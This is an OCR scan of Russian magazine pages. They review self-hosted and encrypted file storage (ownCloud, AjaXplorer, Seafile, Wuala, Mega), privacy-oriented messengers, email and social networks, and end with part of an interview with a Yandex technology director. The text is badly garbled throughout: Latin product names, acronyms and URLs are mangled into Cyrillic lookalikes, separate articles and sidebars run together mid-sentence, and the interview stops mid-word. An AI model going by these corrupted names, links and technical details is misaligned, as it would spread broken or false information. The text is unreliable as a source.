Соодіе Бгіѵе и МісгозоЯ: ЗкуБгіѵе, ЗидагЗупс и хранилищами, использу- 
ющими ѴѴеЬБАѴ, но шифрует файлы при помощи АЕ5-256. Совместим 
с ѴѴіпсІоѵѵз, 05 X, ЮЗ и АпсІгоісІ. Версия Ргее с базовыми возможностями 
(достаточными для персонального использования) доступна бесплатно. 

• СгурІЗупс ( ) совместима с БгорЬох, 

Соодіе Бгіѵе, ЗкуБгіѵе и другими. Доступна сборка только под ѴѴіпсІоѵѵз. 
Распространяется по условиям СІМІІ СРІ_. 



Несколько серверов оѵѵпСІоисІ могут взаимодействовать 
между собой, обеспечивая автоматическое резервное копи- 
рование и миграцию данных пользователя на другой сервер. 
Продукт быстро развивается, новый релиз выходит регулярно 
каждые три месяца. 

Написан оѵѵпСІоисІ на РНР и ЗаѵаЗсгірІ:, в качестве СУБД 
можно использовать ЗОІЛю, МуЗОІ. или РозІдгеЗОІ-. Для раз- 
вертывания подойдет стандартный БАМР- или ѴѴАМР-сервер, 
а сам процесс достаточно тривиален. 

К сожалению, проект имеет длинную историю взломов — 
в разное время в коде оѵѵпСІоисІ исследователи находили 
многочисленные критические уязвимости (выполнение про- 
извольного РНР-кода на сервере, получение полного доступа 
к календарям других пользователей и другие). Поэтому при вы- 
ходе новой версии советуем незамедлительно обновляться. 




Интерфейс оѵѵпСІоисІ организован логично и удобно 



Возможности оѵѵпСІоисІ расширяются при помощи плагинов 
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(Ъ Му ѴѴогкзрасез ▼ Зѵ N01100311003 ▼ хакер 




Работа с АіаХрІогег на- 
поминает настольное 
приложение 



А^АXР^ОНЕН 

АіаХрІогег ( аіахріогѳг.іпіо ) — решение, выросшее за пять лет 
из файл-менеджера, используемого для управления файлами 
на веб-сервере, в полноценную платформу уровня предпри- 
ятия для обмена данными между пользователями при помощи 
веб-интерфейса, ЮЗ- и Апбгоіб-клиента илиѴѴеЬОАѴ. Возможно 
простое создание мини-сайта, на котором будут публиковаться 
списки размещенных документов. Доступно превью для боль- 
шинства распространенных форматов (аудио, видео, РйР, 
офисные документы). В случае изменения каталога или файла 
заинтересованные пользователи получают оповещение. Реа- 
лизован планировщик. Доступ к файлам могут получить как за- 
регистрированные, так и анонимные пользователи. 

Веб-интерфейс локализован (хотя и не полностью), постро- 
ен логично и понятно. Слева собраны все ресурсы (папка, об- 
щие и закладки), вверху панель действий (показываются только 
доступные), справа выводится подробная информация о вы- 
бранном файле. Сами файлы отображаются в окне посередине. 
Вид отображения меняется, ненужные блоки можно убрать. Не- 
которые действия вызываются при помощи контекстного меню. 
В общем и целом работа с АіаХрІогег напоминает настольное 
приложение. 

Возможна аутентификация средствами Асііѵе Оігесіюгу / 
ШАР, НТТР, САЗ, РТР, ОТР и другими. Разделение прав основа- 
но на ролях, применяемых к пользователям и группам, админи- 
стрировать сервер могут несколько человек, которым четко за- 
даются права. Администратор имеет возможность мониторить 
деятельность пользователей в режиме реального времени. 

Обеспечивается шифрование в течение сеанса НТТР8 
и данных на уровне файловой системы при помощи ЕпсРЗ. 
В июне 2013 года профессиональным агентством безопасно- 
сти во Франции ( зѵзсігеат.сот ) был проведен аудит АіаХрІогег, 



в результате которого уязвимостей, специфических для веб- 
приложений, обнаружено не было. 

Доступны плагины (Вгісідез), позволяющие интегрировать 
АіаХрІогег в популярные СМ3, базирующиеся на РНР, — йгираі, 
ѴѴогсІРгезз и Зоотіа. Доступен соответствующий АРІ, поэтому 
список легко расширить. Плагин АіаХрІогег ^ог Рііеііпк ( аоо.ді/ 
58РЮ6) для МогіІІа ТИипсІегЫгсІ позволяет автоматически заме- 
нять большие вложения в сообщении сгенерированной ссыл- 
кой на хранилище АіаХрІогег. 

Модульность позволяет при необходимости нарастить воз- 
можности и собрать систему под конкретные нужды. Например, 
обеспечить доступ к другим источникам данных (файловая си- 
стема, РТР, 5РТР, ЗаплЬа, Аплаіоп 53, РгорЬох, НРСІоиб, ІМАР, 
РОР и так далее), проверять файлы антивирусом. Также при по- 
мощи плагинов подключается текстовый и офисный редактор 
(через веб-сервис 2оНо), реализуется возможность просмотра 
изображений, отображение ЕхіТ-информации, проигрывание 
аудио- и видеофайлов и многое другое. Поведение некоторых 
модулей можно настраивать более тонко, но для этого конфиги 
придется редактировать вручную. Например, чтобы установить 
разрешенные для просмотра и загрузки типы файлов, следует 
заглянуть в зепѵег/соігР/согѵР. ассезз .Тз . іпс. 

Основные плагины поставляются вместе с архивом 
АіаХрІогег, остальные доступны по адресу аіахріогег.іпіо/ 
оіиаіпз . Разработать свой плагин не так уж и сложно, проект 
предоставляет всю необходимую документацию и демонстра- 
ционный плагин, который можно использовать как основу. 

Для индексации и для быстрого поиска по хранилищу ис- 
пользуется библиотека Арасііе І_исепе. 

Написан АіаХрІогег с использованием НТМІ_, РНР, Аіах 
и ЗаѵаЗсгірІ:. Используются стандартные драйверы файловой 
системы, поэтому сервер легко переносить и масштабировать. 



Для АіаХрІогег доступны плагины, позволяющие интегрировать его в по- 
пулярные СМ3, базирующиеся на РНР, — Бгираі, ІѴогдРгезз и ]оотІа . Доступен 
соответствующий АРІ, поэтому список легко расширить . Модульность по- 
зволяет нарастить возможности и собрать систему под конкретные нужды 
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ЗЕАРНЕ 

Самый молодой продукт обзора — ЗеаТіІе ( зѳаіііе.сот ). Первые 
версии были представлены в конце 2012 года, но до релиза 1 .3 
интерфейс был только на китайском языке, поэтому популяр- 
ность он лишь начинает набирать. В ЗеаТіІе реализованы не толь- 
ко функции хранения и синхронизации данных, но и элементы 
совместной работы с контентом. Пользователь может создавать 
любое количество библиотек (по сути, отдельное виртуаль- 
ное хранилище) и открывать доступ для групп, контактов или 
без ограничений. Допущенные пользователи через библиотеку 
обмениваются файлами. В случае изменений предусмотрена 
возможность отправки уведомлений. При создании библиотеки 
возможна активация доступа по паролю и шифрование. В случае 
активации шифрования документ «закрывается» до отправки 
на сервер (его могут просмотреть только допущенные пользова- 
тели), поддерживается НТТР5. На уровне библиотеки также ре- 
ализовано отслеживание версий (по умолчанию 60 дней, можно 
изменить число, хранить всю историю или отключить совсем), 
доступ к предыдущим редакциям, восстановление удаленно- 
го файла, аудит (кто и когда внес изменения). Поддерживается 
предварительный просмотр основных типов файлов, обсужде- 
ние информации с участниками группы, функции ведения спи- 
сков задач и управления проектами, персональное ѴѴікі. 

Еще одним плюсом является меньшая нагрузка на сервер, 
по сравнению с другими участниками обзора. 

Доступ к данным возможен как через веб-интерфейс, так 
и при помощи клиента ЗеаНІе (ѴѴіпсІоѵѵз, Ыпих, ОЗ X, АпсІгоісІ 
и ЮЗ). 

Код проекта написан на языке РуІІіоп и распространяется 
под лицензией СРІ_ѵЗ, для хранения метаданных используется 
ЗОЫіе. Версия СоттипИу ЕсІШоп серверной части предлага- 
ется бесплатно для Ыпих и ПазрЬеггу Рі, для ѴѴіпсІоѵѵз цена со- 



Мои библиотеки Группы бИагее Контакты 


ЗеагсН Рііез 


Библиотеки РеіяопаІ ѴѴікі СІіепіз 
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Тоіаі: 50,7 МБ / 500.0 ГБ 
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Рііе Асйѵіііез 
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МосііЛесі ''(д<1гд<Ш.т<Г. регзопаі-ѵѵікі 

АОММ 1 часов назад 

АскІесІ ЧддгдгіЯ.тсГ. регзопаі-ѵѵікі 

АРММ 1 часов назад 


& & а 

РгоіесІ_А Оеѵеіорт зирег 



ставляет 150 долларов. Также есть Рго ЕсІШоп с большими воз- в Зеабіе можно создать 
можностями: доступ поѴѴеЬйАѴ, функции поиска, оповещение несколько библиотек, 
по етаіі и другое (подробнее здесь: ЬИ:.Іѵ/1сМі2Ѵе ). Кроме того, которые затем синхро- 
можно размещать файлы на сервере разработчика (бесплатно низироватьпоотдель- 
предоставляется до 1 Гб). ности 

ЗАКЛЮЧЕНИЕ 

Каждое решение имеет свои плюсы и минусы, поэтому нужно 
выбирать исходя из конкретных задач. АіаХрІогег и оѵѵпСІоис! 
подкупают своими богатыми функциями, а ЗеаТіІе — легкостью 
и простотой, а также возможностью групповой работы. ИНИ 



ОНЛАЙН-ХРАНИЛИЩА С УПОРОМ НА БЕЗОПАСНОСТЬ 



Найти хранилище для своих файлов сегодня легко, свои варианты предлагают и разра- 
ботчики ОС, например Арріе ЮІоисІ, ІІЬипТи Опе, МісгозоТТ ЗкуОгіѵе. Но со временем об- 
наруживаются те или иные проблемы в безопасности, хостеры признают, что могут кон- 
тролировать контент и закрыть аккаунт. Естественно, у пользователей возникло разумное 
сомнение, стоит ли впредь доверять свои личные файлы «кому попало». Как результат, 
появились альтернативные сервисы, заявляющие о большей защищенности информации: 

• ѴѴиаІа ( ) — шифрование файлов производится локально при помощи клиента 

(ѴѴіпсІоѵѵз, Ыпих, АпсІгоісІ, ЮЗ, ^ѵа — веб-доступ), а затем они загружаются на сервер. 
При этом данные разделяются на несколько частей, которые хранятся в разных местах, 
что обеспечивает меньшую вероятность их потери. Используется АЕ8-256 для шиф- 
рования, ПЗА-2048 подпись и обмен ключами при совместном использовании папок, 
ЗНА-256 для проверки целостности; поддерживается 55І_. Все ключи для расшифров- 
ки хранятся локально. Администраторы сервиса могут просмотреть лишь количество 
занимаемого места, от них скрыты даже метаданные. Правда, это означает, что и вос- 
становить информацию при потере пароля невозможно (доступна подсказка пароля). 
При необходимости шифрование можно отключить. При совместном использовании 
файлов шифрование также не применяется. Бесплатно доступно 5 Гб, пространство 
можно увеличить до 1 Тб. 

• ЗрісІегОак ( ) — проект, развивающийся с 2007 года, по принципу анало- 

гичен ѴѴиаІа. Пользователю бесплатно предоставляется 2 Гб, в дальнейшем место мож- 
но наращивать до 100 Гб. Реализованы клиенты для ѴѴіпсІоѵѵз, Ыпих, ЮЗ, АпсІгоісІ и N900 
(ожидается ВІаскВеггу и ѴѴіпсІоѵѵз РНопе), есть веб-доступ. Епіегргізе-версия отличается 
дополнительными возможностями, вроде 880 Ай/ШАР, и расширенными функциями 
администрирования. Применяется многоуровневый подход к шифрованию с использо- 
ванием комбинации АЕ5-256/РЗА-2048. Поддерживается 55І_. 

• Тгезогіі: ( ) — новый игрок, предлагающий бесплатно 5 Гб места (по акциям 

можно отхватить 50 Гб), шифрование ведется на стороне клиента (АЕЗ-256/ЗНА-512), 
реализованы агенты для ѴѴіпсІоѵѵз, ЮЗ и АпсІгоісІ. Веб-доступа нет. Общие файлы хранят- 
ся в зашифрованном виде и «раскрываются» после загрузки. 

• Меда ( ) — проект с участием Кима Доткома, предлагающий бесплатно 

50 Гб места, с возможностью поднять за $$$ до 4 Тб. Файлы перед загрузкой зашиф- 
ровываются (АЕ5-128) на стороне пользователя через ОаѵаЗсгірі (в будущем НТМ1_5 АРІ 
ѴѴеЬСгуріо). Соединение дополнительно «закрывается» при помощи 55І_. В отличие 
от других сервисов, не предлагаются клиенты и возможность синхронизации, только 
загрузка/выгрузка через браузер. Администратор не может получить доступ к файлам, 
но может просмотреть структуру данных. 




Меда. со. П 2 предлагает 50 Гб места, но доступ только через веб 




ѴѴиаІа шифрует файлы до передачи на хостинг 
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НАХОДКА 

для болтуна 

БЕЗОПАСНЫЕ СПОСОБЫ ОБЩЕНИЯ В СЕТИ 




Юрий «уигетЬо» Язев 

ѵа2еѵ50Й@атаіІ.сопп 



Переходим к самой печальной части нашего рассказа. Хотя почти для каждого типа онлайн- 
коммуникаций есть защищенные решения, для их применения придется убедить твоего собе- 
седника в том, что «так нужно». Как подсказывает опыт фанатов ЗаЬЬег, сделать это без вмеша- 
тельства крупных компаний невозможно. Поэтому данный обзор несет скорее футуристический 
характер — если все это найдет спрос, возможно, кто-нибудь когда-нибудь научится на этом 
зарабатывать. 



ЗАЩИЩЕННЫЕ СООБЩЕНИЯ 

Для пересылки защищенных сообщений разработан крипто- 
графический протокол ОТВ (ОТС-ІДе-ВесогсІ). Для создания 
сильного шифрования протокол использует комбинацию алго- 
ритмов АЕЗ, симметричного ключа, алгоритма Диффи — Хел- 
лмана и хеш-функции 5НА-1 . 

Основное преимущество ОТВ перед другими средствами 
шифрования — это его применение на лету, а не после под- 
готовки и оправления сообщения. Он был разработан Никитой 
Борисовым и Яном Голдбергом. Для использования в сторон- 
них приложениях разработчики протокола создали клиентскую 
либу. Поэтому, чтобы защитить передачу данных по ІМ -каналам, 
можно воспользоваться специально предназначенными для за- 
щиты приложениями. 

Один из подобных проектов — СгурІосаІ; это веб-аппликация 
с открытым исходным кодом, написанная на 05. Имеются рас- 
ширения для СИгопле, Рігейэх и ЗаТагі. Кроме того, есть кли- 
ентское приложение, но только для 08 X. Криптокат шифрует 
сообщения на клиенте и передает их доверенному серверу. 
Для этого на стороне клиента используется симметричное шиф- 
рование сообщений и файлов с использованием АЕ5-256 и вы- 
бранного ключа. Для каждого чата генерируется новый ключ. 

Другие участники разговора — до десяти человек в комна- 
те — смогут прочитать их, только если сами правильно введут 
тот же самый ключ. Для надежной передачи ключей исполь- 
зуется алгоритм Диффи — Хеллмана, для генерации уникаль- 
ных отпечатков при аутентификации — хеш-функция ѴѴИігІрооІ, 
а для проверки целостности сообщений — НМАС-ѴѴНІВІ_РООІ_. 
Метод работы с ключами превращает Сгуріосаі: в систему со- 
вершенной прямой секретности, в которой даже потеря за- 
крытого ключа не может скомпрометировать ключ сессии. Лог 
переписки удаляется через 30 минут отсутствия активности, 
а сам сервис работает с постоянным ЗЗЬшифрованием. 

Еще один проект подобного рода — ВЦтеззаде, написан- 
ный Джонатаном Уорреном на питоне. ВИтпеззаде — это де- 
централизованная Р2Р-программа для обмена зашифрован- 
ными сообщениями между двумя и/или несколькими юзерами. 
Она использует сильную криптографию, которая надежно за- 
щищает абонентов от прослушивания на уровне интернет-про- 
вайдера или на сервере. Стоит заметить, что криптографиче- 
ская система практически в точности копирует схему, которая 
используется в Р2Р-системе Віісоіп, однако направлена на об- 
мен сообщениями. Особенность ВИліеззаде состоит в том, 
что факт общения двух пользователей практически невозможно 
доказать: сообщение передается не напрямую от пользователя 



А к Б, а рассылкой всем участникам сети (подобный подход реа- 
лизован в Тог). При этом прочитать его может только тот пользо- 
ватель, с которым установлено соединение и который обладает 
корректным ключом для расшифровки. 

Последним проектом этого ряда, который мы рассмотрим, 
будет ТогСНаГ Сеть ТогСНаІ: представляет собой свободную 
децентрализованную высокоанонимную криптозащищенную 
систему обмена мгновенными сообщениями и файлами. Весь 
код открыт, а следовательно, проверяем. ТогСИаІ: в основе 
своей использует анонимную сеть Тог, но это полностью обо- 
собленный проект. Анонимность передачи данных целиком 
возлагается на скрытые сервисы Тог, ТогСНаТ по сути, лишь 
надстройка к ним, занимающаяся обработкой сообщений. 
Криптозащита соединения двух пользователей также обе- 
спечивается скрытыми сервисами Тог посредством асимме- 
тричного шифрования по стандарту П5А. Изначально ТогСНаІ: 
был написан на питоне, клиент для ОЗ X, соответственно, 
на ОЬіесііѵе С. В начале 2012 года был запущен проект іТогСГіаІ:, 
разрабатываемый на Оаѵа. Пока в нем не реализована вся 
функциональность оригинального ТогСІіаг, к примеру отсут- 
ствует передача файлов. 




ШРО 

Хотя на мобильных 
устройствах можно 
использовать веб- 
интерфейсы рассмо- 
тренных мессенджеров, 
в разработке находится 
средство обмена мгно- 
венными сообщениями, 
специально заточенное 
под мобилы 
( Щр5:/ЛіетІ.і5 ). 



Широкую известность получило самозакрытие почтового сервиса ІаѵаЬіТсот, 
которым воспользовался Сноуден. Сервис был закрыт после того, как спецслужбы 
предъявили требования предоставить доступ к хранимым данным. 

Полную альтернативу І_аѵаЬИ: найти сложно (кроме зеІТ-ІіозІесІ решений), 
но в качестве более-менее защищенного сервиса можно предложить ѴРЕтаіІ 
( ИНрз:/МетаіІ.пеі ). Он сканирует каждое пришедшее письмо и его вложения 
в поисках вирусов и спама. Если была обнаружена малварь, письмо блокиру- 
ется на шлюзе и не попадает на сервер. Почтовый сервер поддерживает серые 
и черные списки, а для определения спама используется заслужившая признание 
система ЗратАззаззіп. Работа с ѴРЕтаіІ идет посредством стандартных протоко- 
лов РОР, ІМАР, ЗМТР, а веб-интерфейс реализован по защищенному 53І_-каналу. 
Как и большинство современных почтовых служб, ѴРЕтаіІ поддерживает открытие 
в браузере МісгозоИ: ОТТісе документов. Однако за полученную секретность пере- 
писки приходится платить. Правда, есть бесплатный, так называемый «медный 
аккаунт», предоставляющий пользователю 50 Мб серверного пространства для пи- 
сем. Для увеличения места надо купить другой, более совершенный аккаунт. 
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ГОЛОСОВОЙ И ВИДЕОЧАТ Мобильный 

С мгновенными текстовыми сообщениями мы анонимны, мессенджер Нетііз 
а что насчет голосового и видеообщения? Зкуре принадлежит 
МісгозоТІ:, а она (по документам Сноудена) была уличена в пере- 
даче сведений спецслужбам. 

Поэтому нужны другие варианты. Одним из них стал про- 
ект Тох (ірхЛш) — открытая и свободная альтернатива Зкуре. 

Он использует похожую на Зкуре Р2Р модель организации 
взаимодействия в сети для распространения сообщений, ис- 
пользующую криптографические методы для идентификации 
пользователя и защиты транзитного трафика от перехвата. 

Поддерживается обмен текстовыми сообщениями, голосовая 
связь, видеозвонки и передача файлов. Работа организована 
через простой и типичный для ІМ- клиентов графический интер- 
фейс. 

Одна из ключевых задач проекта — обеспечить приватность 
и тайну переписки, в том числе защиту от возможного анализа 
трафика. Для обеспечения адресации пользователей исполь- 
зуется распределенная хеш-таблица (РНТ), работа с которой 
организована в стиле ВИТоггепІ. Канал связи организуется 
при помощи надстройки над протоколом ІЮР с реализацией 
сеансового уровня (І_оззІез5 ІЮР). 



Для идентификации каждого пользователя используется 
специальный публичный ключ, который также применяется 
как открытый ключ для шифрования. Отдельно генерируется 
закрытый ключ для расшифровки сообщений, зашифрованных 
с использованием идентификатора / открытого ключа. Для ор- 
ганизации коммуникаций требуется соединение к пиру (каждый 
клиент сети является пиром), который может быть определен 
вручную или найден автоматически (доступна функция поиска 
пиров в локальной сети). 

Код Тох написан на языке Си и распространяется под ли- 
цензией СРІ_ѵЗ. Поддерживаются платформы І_іпих, ѴѴіпсІоѵѵз 
и ОЗ X. Для организации шифрования используется библио- 
тека ІіЬзосІіит. Функциональность разработки пока находится 
на уровне серии тестовых прототипов, консольного клиента, 
написанного с использованием библиотеки псигзез, и графиче- 
ского клиента на базе 015. 

Кроме того, в СІЧІІ создается альтернатива под названием 
СІЧІІ Ргее СаІІ. Этот проект нацелен на разработку и внедрение 
по всему миру безопасных и самоорганизующихся коммуника- 
ционных сервисов. В качестве базового протокола в СІЧІІ Ргее 
СаІІ будет использоваться 31 Р, поддержка которого обеспечена 
при помощи ѴоІР-сервера СКІІІ 8ІР ѴѴіІсИ. Коммуникационная 



Вообще, соцсети слабо вяжутся с концепцией 
анонимности и приватности переписки. Эти 
сервисы стали источником информации о ли- 
цах всех возрастов: люди пишут в соцсети все 
о себе, своих близких и друзьях, выкладывают 
жизненные фото и видео. Можно ограничить 
доступ к этим сведениям, но это не преграда 
для спецслужб — известны случаи, когда по за- 
просу властей им передавались интересую- 
щие их данные о пользователях. Безусловно, 
соцсети — зло! Но иногда хочется поделиться 
чем-то с родными или рассказать о достиже- 
нии близким друзьям. Поэтому даже соцсети 
играют положительную роль. 

Чтобы защитить свои приватные данные 
от посторонних глаз, можно воспользоваться 



свободными защищенными аналогами. У них, 
конечно, гораздо меньше юзверов — 15-летних 
школьниц, фоткающихся с ойфонами, но тем 
лучше. И чем больше пользователей будут по- 
нимать значимость приватности информации, 
а к этому все идет, тем большее их число будет 
переходить в защищенные соцсети. 

Одна из таких сетей — Ргіепсііса ( Тгіепсііса. 
сот ). Проект был начат в 2011 году Майком 
Макгривином. Ргіепсііса — свободная со- 
циальная сеть с открытым исходным кодом, 
дислоцирующимся на СіШиЬ. Она предостав- 
ляет широкий выбор коннекторов для разно- 
образных социальных сетей: как традиционных 
(РасеЬоок, ТѵѵіНег), так и новых (Ріазрога, 
ІбепП.са). Кроме того, с помощью Ргіепсііса 
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Ударяться в панику 
из-за слежки не имеет 
смысла. Есть защи- 
щенные решения всех 
привычных служб: 
электронной почты, 
мгновенных сообще- 
ний, голосового/ видео- 
чата, соцсетей 



Тох — открытый аналог Клиентское ПО для работы в сети СІМІІ Ргее СаІІ будет под- 

Зкуре держивать широкий спектр разнообразных программных 

платформ. Сеть будет иметь полностью децентрализованную 
структуру, не привязанную к отдельным управляющим серве- 
рам. 

ИТОГИ 



сеть построена с использованием Р2Р-технологий и имеет то- 
пологию тезіі-сети, в которой каждая клиентская точка сети 
связана через соседние клиентские точки. Конечной целью 
проекта является формирование ѴоІР-сети, напоминающей 
Зкуре по возможностям и удобству использования. 

С технической стороны для реализации проекта в СЫІІ 31 Р 
ѴѴИюН, кроме функции маршрутизации ЗІР-звонков, будет обе- 
спечена поддержка работы в роли защищенного ѴоІР-прокси, 
добавлена возможность хранения кеша хостов и выполнения 
функций обмена маршрутами с соседними узлами тезіі-сети. 
Поддержка ѴоІР-прокси позволит упростить построение поль- 
зовательских интерфейсов и создание приложений для мо- 
бильных устройств, поскольку обеспечит поддержку приема 
и выполнения звонков с любых ЗІР-совместимых программных 
телефонов. 



Как видишь, ударяться в панику из-за тотальной слежки не име- 
ет никакого смысла. Существуют защищенные решения всех 
привычных служб: электронной почты, мгновенных сообщений, 
голосового/видеочата, соцсетей. Если воспользоваться ими, 
то никакой Большой Брат (или скромная спецслужба) не зале- 
зет в твои дела. Никто не в состоянии остановить распростра- 
нение информации в интернете! 

Используй все возможности Сети в своих целях! НС 



можно обмениваться письмами и читать НЗЗ- 
ленты. Если в Ргіепсііса сделать фото закрытым, 
то оно на самом деле будет в привате и никто 
(кроме, естественно, владельца и избранных 
им лиц) не сможет получить к нему доступ. 

В настоящее время идет разработка сле- 
дующей версии соцсети под названием Веб 
(что с испанского означает «сеть»). По словам 
авторов, во время разработки Ргіепсііса были 
осознаны детали и обкатаны механизмы раз- 
работки соцсетей, поэтому следующий проект 
станет еще лучше и будет избавлен от фунда- 
ментальных недостатков первой версии. 

Еще одна защищенная социальная сеть, 
на которую мы обратим внимание, — это 
Ріазрога ( ШозѴ/іоіпбіазрога.сот ). Данная 



сеть базируется на трех принципах. В отличие 
от традиционных соцсетей, где данные хранят- 
ся в одном дата-центре, то бишь централизо- 
ванно, в Ріазрога, как и во многих защищенных 
в вебе продуктах, данные хранятся децен- 
трализовано. В этом случае данные хранят- 
ся не на центральном сервере, а на подах 
(роб) — компьютерах тех пользователей, кто 
предоставил их для этой цели. Второй принцип, 
конечно же, свобода, кто мог сомневаться? 
Третий принцип — секретность. Никто, кроме 
тебя, не имеет доступа к твоим данным, а кто 
может их просматривать, определяешь ты сам, 
устанавливая разрешения. И они действуют 
глобально, то есть никто их не нарушит. 
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Кому-то Григорий знаком по подкасту «Радио-Т», соавтором которого он яв- 
ляется уже семь лет. Кому-то он запомнился по выступлениям на различных 
технотусовках. Кто-то видел его проекты на ѲШНиЬ’е. Но блиц-опрос, прове- 
денный в редакции, показал, что никто не знает, чем он занимается в реальной 
жизни. Самая близкая к истине версия звучала так: «Ну, наверно, что-то вроде 
евангелиста». На самом деле все сложнее. Это же Яндекс. И это же Бобук. 

КРАТКО 




Если кто-то англоязычный спрашивает меня, чем я зани- 
маюсь, у меня есть отличная фраза: I сіо ту Ьезі. Я делаю 
все, что могу, делаю то лучшее, что могу сделать. Это правда, 
я не кривлю душой. Если я вижу какую-то часть работы, кото- 
рую могу сделать, и понимаю, что никто больше до нее сейчас 
не дотягивается, я беру и делаю. 

Яндекс — такая компания, где ты можешь поработать 
руками в любой момент. Когда случилась трагедия и умер 
Илья Сегалович, мы решили, что нужно сделать сайт памяти. 
Этим сайтом занимались 5-6 человек, в том числе — я и один 
из руководителей нашего направления. Один фигачил руками 
код, другой делал ресайзилку картинок. У нас буквально все, 
начиная от уборщиц и заканчивая руководителями больших на- 
правлений, в состоянии поработать руками и любят это делать. 

Обычно я говорю, что в Яндексе плохо — здесь нужно 
работать. 

До Яндекса я работал техническим директором, 
но устал управлять людьми, и я сказал: «Хочу работать 
руками». Я готов был пойти в Яндекс, если меня возьмут про- 
сто админом. 

После короткого собеседования меня взяли в Яндекс 
на работу. Но через неделю стало ясно, что меня «кинули»: 
здесь нужно работать не только руками, но и головой. Еще че- 
рез полгода у меня опять завелись подчиненные. Еще через 
полтора года я, по несчастливому стечению обстоятельств, 
перешел из управления серверами к управлению людьми 
и разработками. Так и пошло — группа, отдел, направление... 
В общем, работы в Яндексе у меня до фига. 

Мой круг обязанностей — грустная тема. Последние 
пару лет я занимался тем, что облегчал жизнь Илье Сегалови- 
чу. Просто снимал с него задачи. Сейчас Ильи не стало, и воз- 
ник большой вопрос — что делать дальше? И внезапно пришло 
осознание, что нужно сделать всё, чтобы все те концепции, 
что остались после него, воплотились в жизнь. Их много. Я так 
прикинул... только их лет на пять нам точно хватит. 

Можно ли куда-то уйти? Это тоже грустная история. Дело 
в том, что людям, поработавшим в Яндексе, больше в России 
деваться попросту некуда. 

ИСТОРИЧЕСКИ СЛОЖИЛОСЬ 

Никто не понимает, что значит «директор по распростра- 
нению технологий». Название придумали, когда возникла 
необходимость прилепить мне хоть какую-то должность. Ее 
прилепили, и я не парюсь. 

Я выступаю шлюзом между компанией «Яндекс» 
и внешним миром. Пытаюсь вытащить наружу технологии, 
которые созданы внутри компании, а хорошие инструменты, 
которые есть снаружи, — затащить внутрь. Это удобная по- 
зиция. Потому что я очень хорошо знаю и постоянно слежу 
за тем, что происходит в мире. И при этом я обладаю некото- 
рым авторитетом внутри компании и представляю, что проис- 
ходит внутри. 

Вообще уследить за всем, что делается в Яндексе, не- 
просто. Все-таки в компании работает пять тысяч человек. 

Люди, занимающиеся некой технологией или на- 
правлением, знают про новые технологии, но не всегда 
успевают все пробовать. Поэтому нередка ситуация, когда 
ко мне приходит кто-нибудь и спрашивает: «А ты пробовал 



Саззапсіга? Как она?». И ты начинаешь рассказывать про все 
ужасы и прелести Саззапсіга, практически «блеск и нищета 
ореп зоигсе». 

Кстати, если разработчику нравится, скажем, 
Саззапсіга, это еще не значит, что у него получится ис- 
пользовать ее в производстве. Придет администратор 
и скажет: «Ребята, мы пробовали эту штуку много раз и, мяг- 
ко выражаясь, не умеем ей пользоваться, она не подходит 
для наших работ. Давайте лучше выберем из этого или этого». 

С другой стороны, нужно быть в курсе всего, что де- 
лается в мире, нужно читать и все пробовать руками. Чи- 
тать для того, чтобы понимать, куда движется рынок, интернет, 
технологии. И постоянно пробовать что-то раньше всех, чтобы 
иметь собственное мнение о том, что это такое. Скажем, читая 
оѴѴіпсіоѵѵз РІіопе и думая о том, что за ним стоит, можно пред- 
ставить себе какие-то ужасы. Зато, когда трогаешь это руками, 
понимаешь, что все совсем не так плохо. 

Кроме того, нужно вытаскивать новые концепции из на- 
ших разработчиков и людей, кто работает руками. Так, 
как в прошлом году мы вытащили «Острова». Нужно приносить 
идеи в компанию, а иногда и выносить какие-то концепты наружу. 

В анонсах, которые мы делаем на конференциях 
для разработчиков, очень много моей работы. Взять хотя 
бы Ѵеі: апоіііег СопТегепсе (ѴаС). Кстати, в этом году там будет 
отдельная секция по инфобезопасности. 

Чтобы быть в теме, у меня есть самописный инстру- 
мент для чтения новостей. Система, которая позволяет 
агрегировать штук 500 новостных потоков и выбирать из них 
в полуавтоматическом режиме то, что может быть мне потен- 
циально интересно. Что-то вроде Ргізтабс’а, только сделан- 
ное задолго до его появления. 

Традиционные агрегаторы новостей считают перехо- 
ды и клики, а мне нужно другое. Я часто, еще не понимая, 
что означает этот снипет, перехожу по ссылке, чтобы разо- 
браться, что там такое. Для меня важнее, на какое время я за- 
держался на странице, проскроллил ли я первую страницу, 
промотав вниз, и так далее. 

ПОИСКОВАЯ КОМАНДА 

Рождение нового проекта в Яндексе обычно завязано 
на договоренностях. Чаще всего это выглядит так: есть чело- 
век, который горит некой идеей. Этот человек может быть тех- 
нарем, а может вообще работать в службе поддержки. Он на- 
чинает бегать по компании с криками «А давайте сделаем!». 

В конце концов он кого-то убеждает, люди собирают- 
ся вместе и обсуждают, как можно сделать такой сервис. 
После они идут к руководству компании, к примеру к руково- 
дителю своего направления, и говорят: «Есть вот такая гени- 
альная штука, давай сделаем». И тут участвует много сторон. 



С 2006 года соведущий 
популярнейшего под- 
каста «Радио-Т». 

Занимает должность 
директора по распро- 
странению технологий 
Яндекса, но мало кто 
знает, что это означает. 

Ниндзя работоспособно- 
сти: спит 2-4 часа в день. 

Склонен к исследова- 
ниям мира: работал по 
контрактам в двадцати 
странах мира. 

Все измеряет. Установил, 
что в неделю получает 6,6 
писем, начинающихся 
со слов «У меня есть 
гениальная идея». 

Купил три разных мото- 
цикла, неодновременно 
может ездить только на 
одном. 



>350 

ВЫПУСКОВ 
«РАДИО-Т» ВЫ- 
ШЛО НА ДАННЫЙ 
МОМЕНТ. ПОД- 
КАСТ ВЫХОДИТ 
С 2006 ГОДА. 



Можно ли куда-то уйти? Это тоже 
грустная история . Дело в том, что 
людям, поработавшим в Яндексе, больше 
в России деваться попросту некуда 
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Интервью 







Есть программисты. Они программируют. У них чаще 
всего есть Іеапл ІеасІ — человек, который руководит некой 
группой. Как правило, сам он тоже программирует. Програм- 
мисты разделяются на серверную и клиентскую часть, так 
как это совершенно разные области знаний. 

Про админов Яндекса нужно понимать, что наш сред- 
ний админ программирует лучше среднего программи- 
ста на рынке. Долгое время наши админы вообще писали 
совершенно свою ОС для использования внутри компании. 
Поэтому программистам легко договариваться с админами 
о том, как будет выглядеть проект с серверной точки зрения. 

Страшно не люблю термин «специалист по изег 
ехрегіепсе». Однако наши дизайнеры — это специалисты, ко- 
торые понимают, как пользователь работает с интерфейсом. 
Они рисуют, проектируют интерфейс будущего приложения 
или сайта. 

Еще есть ребята Антона Карпова (директор Яндек- 
са по ИБ. — Прим, ред.), они в основном бьют по рукам 
системных администраторов. Делают так, чтобы с самого 
начала все было понятно и безопасно. Они следят, чтобы ис- 
